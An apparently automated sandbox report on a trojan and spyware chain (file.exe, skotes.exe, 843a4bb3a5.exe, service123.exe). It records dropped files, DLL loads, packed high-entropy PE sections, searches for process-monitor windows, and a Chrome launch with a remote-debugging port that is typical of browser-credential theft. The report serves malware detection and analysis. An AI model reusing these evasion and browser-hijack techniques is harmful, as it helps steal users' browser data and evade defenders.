Source: service123.exe.7.dr Binary string: .\Device\HarddiskVolume3\Windows\System32\csrss.exe
Source: service123.exe.7.dr Binary string: \Device\HarddiskVolume3\Windows\System32\OptionalFeatures.exe
Source: service123.exe.7.dr Binary string: \Device\NetbiosSmb
Source: service123.exe.7.dr Binary string: \Device\DeviceApi\Dev\Query
Source: service123.exe.7.dr Binary string: x\Device\HarddiskVolume3\Program Files\Mozilla Firefox\firefox.exeBroh
Source: service123.exe.7.dr Binary string: i\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exeoma
Source: service123.exe.7.dr Binary string: \Device\HarddiskVolume3\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeh
Source: service123.exe.7.dr Binary string: \Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Source: service123.exe.7.dr Binary string: P\Device\HarddiskVolume3\Windows\System32\ApplicationFrameHost.exerPl
Source: service123.exe.7.dr Binary string: \Device\HarddiskVolume3\Windows\ServiceProfiles\NetworkService\NTUSER.DAT{53b39e87-18c4-11ea-a811-000d3aa4692b}.TxR.2.regtrans-ms
Source: service123.exe.7.dr Binary string: 45\Device\HarddiskVolume3\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe340511
Source: service123.exe.7.dr Binary string: \Device\HarddiskVolume3\Windows\System32\oobe\FirstLogonAnim.exe
Source: service123.exe.7.dr Binary string: \Device\HarddiskVolume3\Windows\System32\msdt.exe
Source: service123.exe.7.dr Binary string: \Device\HarddiskVolume3\Windows\System32\WerFault.exe1c1
Source: service123.exe.7.dr Binary string: \Device\Tcpip6_{93123211-9629-4E04-82F0-EA2E4F221468}\Device\Tcpip6_{2EE2C70C-A092-4D88-A654-98C8D7645CD5}\Device\Tcpip6_{07374750-E68B-490E-9330-9FD785CD71B6}\Device\Tcpip_{32CB138B-8507-4CEC-BA14-FC0247804FD4}\Device\Tcpip6_{32CB138B-8507-4CEC-BA14-FC0247804FD4}\Device\Tcpip6_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}\Device\Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: service123.exe.7.dr Binary string: \Device\HarddiskVolume3\Windows\explorer.exe
Source: service123.exe.7.dr Binary string: \Device\HarddiskVolume3\Windows\System32\notepad.exeF}
Source: service123.exe.7.dr Binary string: \Device\{32CB138B-8507-4CEC-BA14-FC0247804FD4}\Device\{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: service123.exe.7.dr Binary string: \Device\HarddiskVolume3\Windows\System32\SystemSettingsAdminFlows.exe
Source: service123.exe.7.dr Binary string: \Device\HarddiskVolume3\Program Files\Mozilla Firefox\firefox.exe
Source: service123.exe.7.dr Binary string: \Device\HarddiskVolume3\Windows\System32\OpenWith.exe
Source: service123.exe.7.dr Binary string: 0\Device\HarddiskVolume3\Windows\System32\dwm.exe
Source: service123.exe.7.dr Binary string: \Device\HarddiskVolume3\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
Source: service123.exe.7.dr Binary string: \Device\DeviceApi\Dev\NoState
Source: service123.exe.7.dr Binary string: \Device\P
Source: service123.exe.7.dr Binary string: \Device\HarddiskVolume3\Windows\SysWOW64\cscript.exeP
Source: service123.exe.7.dr Binary string: \Device\HarddiskVolume3\Windows\SysWOW64\cscript.exeP:
Source: service123.exe.7.dr Binary string: e\Device\HarddiskVolume3\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exehe\
Source: service123.exe.7.dr Binary string: eA\Device\HarddiskVolume3\Users\user\Desktop\OfficeSetup.exe
Source: service123.exe.7.dr Binary string: \Device\HarddiskVolume3\Windows\System32\cmd.exe
Source: service123.exe.7.dr Binary string: \Device\HarddiskVolume3\Windows\System32\ApplicationFrameHost.exe
Source: service123.exe.7.dr Binary string: 9\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe749
Source: service123.exe.7.dr Binary string: \Device\HarddiskVolume3\Windows\System32\dwm.exe
Source: service123.exe.7.dr Binary string: \Device\HarddiskVolume3\Windows\System32\winver.exeX
Source: service123.exe.7.dr Binary string: \Device\HarddiskVolume3\Windows\System32\csrss.exe
Source: service123.exe.7.dr Binary string: \Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exeo
Source: service123.exe.7.dr Binary string: \Device\HarddiskVolume3\Windows\Service
Source: service123.exe.7.dr Binary string: i\Device\HarddiskVolume3\Windows\System32\notepad.exeF}
Source: service123.exe.7.dr Binary string: \Device\HarddiskVolume3\Windows\System32\winver.exe
Source: service123.exe.7.dr Binary string: o\Device\HarddiskVolume3\Windows\System32\OpenWith.exe110
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@18/6@10/6
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985 Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: chrome.exe, 00000009.00000002.2851331632.000079F40296C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: file.exe Virustotal: Detection: 43%
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe "C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe"
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2420 --field-trial-handle=2348,i,10504154459402330811,16956138012118111025,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe "C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default" Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2420 --field-trial-handle=2348,i,10504154459402330811,16956138012118111025,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32 Jump to behavior
Source: file.exe Static file information: File size 1893376 > 1048576
Source: file.exe Static PE information: Raw size of durrfrps is bigger than: 0x100000 < 0x19c600

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;durrfrps:EW;porwkuev:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;durrfrps:EW;porwkuev:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 1.2.skotes.exe.bf0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;durrfrps:EW;porwkuev:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;durrfrps:EW;porwkuev:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 2.2.skotes.exe.bf0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;durrfrps:EW;porwkuev:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;durrfrps:EW;porwkuev:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 6.2.skotes.exe.bf0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;durrfrps:EW;porwkuev:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;durrfrps:EW;porwkuev:EW;.taggant:EW;
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: random[1].exe.6.dr Static PE information: real checksum: 0x443157 should be: 0x440e4e
Source: file.exe Static PE information: real checksum: 0x1d01a4 should be: 0x1d1470
Source: skotes.exe.0.dr Static PE information: real checksum: 0x1d01a4 should be: 0x1d1470
Source: 843a4bb3a5.exe.6.dr Static PE information: real checksum: 0x443157 should be: 0x440e4e
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: durrfrps
Source: file.exe Static PE information: section name: porwkuev
Source: file.exe Static PE information: section name: .taggant
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: durrfrps
Source: skotes.exe.0.dr Static PE information: section name: porwkuev
Source: skotes.exe.0.dr Static PE information: section name: .taggant
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name: .rsrc
Source: random[1].exe.6.dr Static PE information: section name: .idata
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name: snkouwyn
Source: random[1].exe.6.dr Static PE information: section name: vyybilms
Source: random[1].exe.6.dr Static PE information: section name: .taggant
Source: 843a4bb3a5.exe.6.dr Static PE information: section name:
Source: 843a4bb3a5.exe.6.dr Static PE information: section name: .rsrc
Source: 843a4bb3a5.exe.6.dr Static PE information: section name: .idata
Source: 843a4bb3a5.exe.6.dr Static PE information: section name:
Source: 843a4bb3a5.exe.6.dr Static PE information: section name: snkouwyn
Source: 843a4bb3a5.exe.6.dr Static PE information: section name: vyybilms
Source: 843a4bb3a5.exe.6.dr Static PE information: section name: .taggant
Source: service123.exe.7.dr Static PE information: section name: .eh_fram
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00C0D91C push ecx; ret 6_2_00C0D92F
Source: file.exe Static PE information: section name: entropy: 7.987056831585829
Source: file.exe Static PE information: section name: durrfrps entropy: 7.952522878872974
Source: skotes.exe.0.dr Static PE information: section name: entropy: 7.987056831585829
Source: skotes.exe.0.dr Static PE information: section name: durrfrps entropy: 7.952522878872974
Source: random[1].exe.6.dr Static PE information: section name: snkouwyn entropy: 7.956042320086044
Source: 843a4bb3a5.exe.6.dr Static PE information: section name: snkouwyn entropy: 7.956042320086044
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Jump to dropped file

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
